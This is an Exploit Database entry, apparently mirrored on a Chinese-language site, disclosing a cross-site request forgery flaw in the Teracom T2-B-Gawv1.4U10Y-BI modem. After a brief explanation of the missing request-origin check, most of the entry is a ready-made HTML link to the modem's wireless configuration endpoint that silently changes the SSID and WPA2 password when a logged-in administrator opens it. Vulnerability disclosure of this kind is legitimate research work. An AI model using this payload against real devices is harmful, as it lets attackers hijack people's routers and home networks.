Teracom Modem T2-B-Gawv1.4U10Y-BI – Cross-Site Request Forgery

• Exploit Database
• 35 阅读

• 作者： Rakesh S
  日期： 2014-04-20
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/32943/

• # Exploit Title: Teracom Modem CSRF Vulnerability
  # Date: 20-04-2014
  # Author: Rakesh S
  # Software Link: http://www.teracom.in/
  # Version:T2-B-Gawv1.4U10Y-BI
  
  The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password.
   
  The exploitation example below changes password for the SSID:
   
   
  <a href="http://[HOST]/webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=1&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=8&essid=SSID&hidessid=off&security=wpa2&encryptionselect=tkip&authmethodselect=psk&wpapp=ChangePassword&pmkcaching=on&confirm=Confirm" target="myIframe">Submit</a>